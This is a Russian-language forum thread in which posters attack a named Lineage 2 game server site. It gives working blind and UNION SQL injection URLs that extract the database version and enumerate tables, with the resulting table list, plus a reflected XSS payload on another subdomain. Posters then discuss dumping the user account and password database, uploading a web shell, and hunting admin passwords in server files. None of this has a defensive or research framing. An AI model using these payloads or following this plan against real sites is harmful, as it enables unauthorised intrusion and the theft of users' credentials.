все таки одна скуля нашлась=)
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(), 1,1)))=53/* 5
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(), 2,1)))=46/* .
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(), 3,1)))=49/* 1
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(), 4,1)))=46/* .
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(), 5,1)))=49/* 1
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+AND+ascii(lower(substring(version(), 6,1)))=54/* 6
http://lineage2.wnet.ua/library/l2dp/item.php?id=2+and(1=(select+1))/*
gratz constantine.

А чего так криво)) связка операторов union+select вполне функционирует
http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,version()/*

Какие то такие запросы будут получаться, инфу вывести не сложно
http://lineage2.wnet.ua/library/l2dp/item.php?id=-1+Union+select+1,2,3,column_name+from+information_ schema.columns+where+table_name=0x4e7063496e666f/*

тока никто не учёл такую вещь как user()=L2db@localhost => доступные таблицы это тока те которые относятся к справочной базе=\
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
Armor
ClassStats
Classes
DropLog
Drops
Dropsl2db
EtcItems
GainSkills
GainSkillsLog
IngredientLog
Ingredients
Ingredientsl2db
ItemNames
Items
Locations
Monsters
NpcInfo
NpcLog
NpcNames
QuestDetailLog
QuestDetails
QuestLog
QuestNames
Quests
RecipeLog
Recipes
Recipesl2db
SetItems
Sets
SkillNames
Skills
Stores
SysStrings
Teleports
Weapons

xss. ';/ фильтруютсяhttp://l2w2new.wnet.ua/UserPanel/showchar.asp?action=search&name=%3CBODY%20onload=alert(%22xss%22)%3E

ТС Базу юзеров ты не сдапиш.
Так как линейка хранит не в мускул а вроде в мсскл

ТС Базу юзеров ты не сдапиш.
Так как линейка хранит не в мускул а вроде в мсскл
если реч идет о слити данных об акках которые стоят на етом сервере,то я незнаю как етот сервак но я много серваков ставил(у себя на компе)))и все они были на mysql ;)
и вобще с чего вы взяли что базы етого сервака будут на етом сайте???сервак то наверняка стоит у них на компе...

Офф на МайСкюл?
какие серваки ты ставил? может явы...
внет считается одним из топ УА сервов ла2...
то что там БД не Мумкул (от серва) гарантирую
+Гмы не настолько там тупы (с виду =))) )
было у мну дело тоже с оффом
вроде все было и уже пассы и доступ... скрипта на "легкое слитие бд" небыло
с МССКЮЛОМ не дружил (увы (( ) да и щас не дружу... так слить базу пассов не удалось...
база с сервом стоят в офисе (хз что и как настроено)
теоретически можно попробовать какимто раком залить шелл (не судите строго не оч разбираюсь)
там уже в конфигурациях или даже просто в файлах (админы любят пассы хранить в текстовиках на роб. столе) узнать все пассы (доступ, назв. баз и тд)
ну а там думать )

строго не судите пост
02.00

да ты прав я ставил ява серваки...но етот сервак 100% не офф так что база наверняка в мускуле...и если вся база о аккуантах тоже наверняка храниться у них на компе...так что если хотите слить базу нужно пытаться конектиться к кмопу или че то типа етого(я просто представления не имею как ето сделать...)=)т.к. на сайте об базах сервака точно ни че нету

слуш почему ты так уверен что это ява то? )
вот сколько лет уже его почемуто оффом называют...
я говорю не к тому чтоб обидеть или еще что-то но просто внет явой быть ну никак не может...
и ставил его поверь мне не ребенок, серв профисиональный,
явы так обычно не работают много показателей...
хотя хз они недавно переезжали вроде, в общем просто хотелось бы услышать почему он ява... просто все время считал его оффом...

сомневаюсь очень крайне что он на мускуле...
ты хоть раз ставил офф?
еще раз вопрос - откуда такие сравнения?
---

Офф на каждом втором серваке сейчас стоит, слили все, кому не лень
По поводу базы: да, в офф-версиях используется Mssql, причем адрес игрового сервера редко совпадает с адресом сервера, где находится/хостится сайт.

таки да
но... теоретически залив шелл все равно можно найти данные о серве и БД самой игры...
но достаточно геморно...

просто шелл еще достаточно палевно...
можно еще какимто способом бд слить?